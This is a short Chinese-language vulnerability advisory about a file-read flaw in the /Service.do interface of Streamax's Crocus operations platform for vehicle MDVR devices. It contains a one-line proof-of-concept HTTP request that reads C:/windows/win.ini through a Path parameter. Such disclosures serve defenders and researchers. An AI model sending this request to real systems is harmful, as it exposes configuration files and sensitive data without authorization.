锐明 Crocus 运维平台 /Service.do 文件读取漏洞

日期: 2025-06-06 | 影响软件: 锐明Crocus运维平台 | POC: 已公开

漏洞描述

Crocus 是针对锐明车载MDVR在日常维护时使用的工作平台。Crocus 的 /Service.do 接口存在文件读取漏洞,攻击者可利用该漏洞获取系统的敏感信息,例如配置文件或其他重要数据,可能导致信息泄露和系统安全风险。

PoC代码

GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1

相关漏洞推荐